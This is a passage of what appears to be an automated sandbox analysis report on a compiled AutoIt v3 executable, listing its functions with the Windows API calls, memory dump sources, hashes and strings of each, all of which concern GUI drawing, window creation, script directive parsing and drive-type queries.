                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                        • Opcode ID: b4da1e1e080f0d58b4329cc38e6062e430e26beb2cba39c76241b30eaf896824
                                                                                                                                        • Instruction ID: 2cc0c3d876dc0d7dfb5414546efc7115c603664e8c47c33f800f362211415f92
                                                                                                                                        • Opcode Fuzzy Hash: b4da1e1e080f0d58b4329cc38e6062e430e26beb2cba39c76241b30eaf896824
                                                                                                                                        • Instruction Fuzzy Hash: 8C026F71A00259FFDB25DF64CC89EAE7BB9FB48310F108159F915AB2A1DB389D41CB60
                                                                                                                                        Function 007CD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 007CD0EB
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 007CD11C
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 007CD128
                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 007CD142
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 007CD151
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007CD17C
                                                                                                                                        • GetSysColor.USER32(00000010), ref: 007CD184
                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 007CD18B
                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 007CD19A
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007CD1A1
                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 007CD1EC
                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 007CD21E
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007CD249
                                                                                                                                          • Part of subcall function 007CD385: GetSysColor.USER32(00000012), ref: 007CD3BE
                                                                                                                                          • Part of subcall function 007CD385: SetTextColor.GDI32(?,?), ref: 007CD3C2
                                                                                                                                          • Part of subcall function 007CD385: GetSysColorBrush.USER32(0000000F), ref: 007CD3D8
                                                                                                                                          • Part of subcall function 007CD385: GetSysColor.USER32(0000000F), ref: 007CD3E3
                                                                                                                                          • Part of subcall function 007CD385: GetSysColor.USER32(00000011), ref: 007CD400
                                                                                                                                          • Part of subcall function 007CD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CD40E
                                                                                                                                          • Part of subcall function 007CD385: SelectObject.GDI32(?,00000000), ref: 007CD41F
                                                                                                                                          • Part of subcall function 007CD385: SetBkColor.GDI32(?,00000000), ref: 007CD428
                                                                                                                                          • Part of subcall function 007CD385: SelectObject.GDI32(?,?), ref: 007CD435
                                                                                                                                          • Part of subcall function 007CD385: InflateRect.USER32(?,000000FF,000000FF), ref: 007CD454
                                                                                                                                          • Part of subcall function 007CD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CD46B
                                                                                                                                          • Part of subcall function 007CD385: GetWindowLongW.USER32(00000000,000000F0), ref: 007CD480
                                                                                                                                          • Part of subcall function 007CD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CD4A8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3521893082-0
                                                                                                                                        • Opcode ID: 2ca0b499948ebaad40a952fe072029f066b83af2c56b3f2899cb5c5cccc7e423
                                                                                                                                        • Instruction ID: 83f1c13b2afbcc3952b041b0458a732d7d6cf9cf39a8008301d7946e281cf518
                                                                                                                                        • Opcode Fuzzy Hash: 2ca0b499948ebaad40a952fe072029f066b83af2c56b3f2899cb5c5cccc7e423
                                                                                                                                        • Instruction Fuzzy Hash: 4C91B071009345AFCB209F64DC88E6BBBA9FF89324F104A2DF9629A1E0D779DD40CB55
                                                                                                                                        Function 007BA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 007BA42A
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007BA4E9
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007BA527
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007BA539
                                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007BA57F
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 007BA58B
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007BA5CF
                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007BA5DE
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 007BA5EE
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 007BA5F2
                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007BA602
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007BA60B
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 007BA614
                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007BA642
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 007BA659
                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007BA694
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007BA6A8
                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 007BA6B9
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007BA6E9
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 007BA6F4
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007BA6FF
                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007BA709
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                        • Opcode ID: 10b3261213f9af699a2bf31d1b4293cbf27164e1b17fc42d1c7c2cb113a0dc5c
                                                                                                                                        • Instruction ID: 3251cfa7c148cd3c69564d69c1ca5cda1ef2d267622f31b2929bba2d45326c8a
                                                                                                                                        • Opcode Fuzzy Hash: 10b3261213f9af699a2bf31d1b4293cbf27164e1b17fc42d1c7c2cb113a0dc5c
                                                                                                                                        • Instruction Fuzzy Hash: B4A16271A00655BFEB24DBA8DC89FAE7BB9FB04710F108114FA15AB2E0D774AD41CB64
                                                                                                                                        Function 007AE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 007AE45E
                                                                                                                                        • GetDriveTypeW.KERNEL32(?,007FDC88,?,\\.\,007FDBF0), ref: 007AE54B
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,007FDC88,?,\\.\,007FDBF0), ref: 007AE6B1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                        • Opcode ID: 5b25c0b85c8b0edbad79cf125890940af282d25d6a557d7f94837fdcdf2056e0
                                                                                                                                        • Instruction ID: 138507c7dafcfe22a4e4f0974f2bb6babaeafef351308e5b5973684fa5edc9b6
                                                                                                                                        • Opcode Fuzzy Hash: 5b25c0b85c8b0edbad79cf125890940af282d25d6a557d7f94837fdcdf2056e0
                                                                                                                                        • Instruction Fuzzy Hash: 4451D130208301EB8610DF18CC9586AB7A5FFE6715B118F19F456EB391EB6CDE85DB82
                                                                                                                                        Function 0076C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                        • API String ID: 1038674560-86951937
                                                                                                                                        • Opcode ID: 9f53ae1db48533f1483e11d8c83056f0b1d9c258dc47164fb7a3856e897a529d
                                                                                                                                        • Instruction ID: 1ef4309514bdf9c749635ba1ab3d5abb3f89e79d353e7f8dc61d636233aa7f88
                                                                                                                                        • Opcode Fuzzy Hash: 9f53ae1db48533f1483e11d8c83056f0b1d9c258dc47164fb7a3856e897a529d
                                                                                                                                        • Instruction Fuzzy Hash: 606119B1740356BBDB32BA648C46FBA336DAF15740F044025FD9AA6283EB5CDE05C7A1
                                                                                                                                        Function 007648C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32 ref: 00764956
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00764998
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007649A3
                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 007649AE
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 007649B9
                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 007DE179
                                                                                                                                        • 6F540200.COMCTL32(?,000000FF,?), ref: 007DE1B2
                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 007DE5E0
                                                                                                                                          • Part of subcall function 007649CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00764954,00000000), ref: 00764A23
                                                                                                                                        • SendMessageW.USER32 ref: 007DE627
                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007DE63E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DestroyMessageSendWindow$DeleteObject$CursorF540200InvalidateMoveRect
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 22932394-4108050209
                                                                                                                                        • Opcode ID: 57051668ef66dcbae10519952e39ac53d850b8562c82d30f1c8e9451f501fbae
                                                                                                                                        • Instruction ID: 1541bc6ce861c8254f5cd147d8d01785610000cfb66f35c7a8df5e3ee2bc6a53
                                                                                                                                        • Opcode Fuzzy Hash: 57051668ef66dcbae10519952e39ac53d850b8562c82d30f1c8e9451f501fbae
                                                                                                                                        • Instruction Fuzzy Hash: 83128D30200641DFDB26EF14C888BAABBB5BF09304F54456AF99ADF252C739EC55CB91
                                                                                                                                        Function 007CC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 007CC598
                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007CC64E
                                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 007CC669
                                                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 007CC925
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                                        • Opcode ID: f09889987d463fbb052c9bf813f8f364286f1e70a97058a4d3f4604486223a44
                                                                                                                                        • Instruction ID: 73ae82ae593929181fc117b39f303ea07b45af26e3e9e696050a75cbe62b98ad
                                                                                                                                        • Opcode Fuzzy Hash: f09889987d463fbb052c9bf813f8f364286f1e70a97058a4d3f4604486223a44
                                                                                                                                        • Instruction Fuzzy Hash: DAF1EF71205341AFE7228F24C889FAABBE4FF49354F18862DF59DD62A1C778D850CB52
                                                                                                                                        Function 007C6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?,007FDBF0), ref: 007C6245
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                        • API String ID: 3964851224-45149045
                                                                                                                                        • Opcode ID: 5ec4d4fd187f4a11b7f7e7b3e547c2860829dc72ee56a4a0440becf5704062da
                                                                                                                                        • Instruction ID: e7ce039841b8c71d98d74fe476cebf4aae7f67e3d5973e89fd5327dd4eb17f28
                                                                                                                                        • Opcode Fuzzy Hash: 5ec4d4fd187f4a11b7f7e7b3e547c2860829dc72ee56a4a0440becf5704062da
                                                                                                                                        • Instruction Fuzzy Hash: 7FC18174204201CBCF04EF54D595FAE7796BF94390F14886CF8869B3A6CB28DD4ACB82
                                                                                                                                        Function 007CD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 007CD3BE
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 007CD3C2
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 007CD3D8
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 007CD3E3
                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 007CD3E8
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 007CD400
                                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CD40E
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 007CD41F
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 007CD428
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 007CD435
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007CD454
                                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CD46B
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 007CD480
                                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CD4A8
                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007CD4CF
                                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 007CD4ED
                                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 007CD4F8
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 007CD506
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 007CD50E
                                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007CD522
                                                                                                                                        • SelectObject.GDI32(?,007CD0B5), ref: 007CD539
                                                                                                                                        • DeleteObject.GDI32(?), ref: 007CD544
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 007CD54A
                                                                                                                                        • DeleteObject.GDI32(?), ref: 007CD54F
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 007CD555
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 007CD55F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1996641542-0
                                                                                                                                        • Opcode ID: 88e9d33d52ca6d0dee394a0817eeb664f330e34801ffec28f9bc754aa156b463
                                                                                                                                        • Instruction ID: 4c7f177d76cb0d79b0cb18ce5b7f5966a6b9bb08aa1108f6630b4873e9f92e03
                                                                                                                                        • Opcode Fuzzy Hash: 88e9d33d52ca6d0dee394a0817eeb664f330e34801ffec28f9bc754aa156b463
                                                                                                                                        • Instruction Fuzzy Hash: E2512D71901248FFDF209FA4DC88EAE7B79FB08320F218519F915AB2A1D7799E40CB54
                                                                                                                                        Function 007CB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007CB5C0
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007CB5D1
                                                                                                                                        • CharNextW.USER32(0000014E), ref: 007CB600
                                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007CB641
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007CB657
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007CB668
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007CB685
                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 007CB6D7
                                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007CB6ED
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 007CB71E
                                                                                                                                        • _memset.LIBCMT ref: 007CB743
                                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007CB78C
                                                                                                                                        • _memset.LIBCMT ref: 007CB7EB
                                                                                                                                        • SendMessageW.USER32 ref: 007CB815
                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 007CB86D
                                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 007CB91A
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 007CB93C
                                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 007CB986
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007CB9B3
                                                                                                                                        • DrawMenuBar.USER32(?), ref: 007CB9C2
                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 007CB9EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
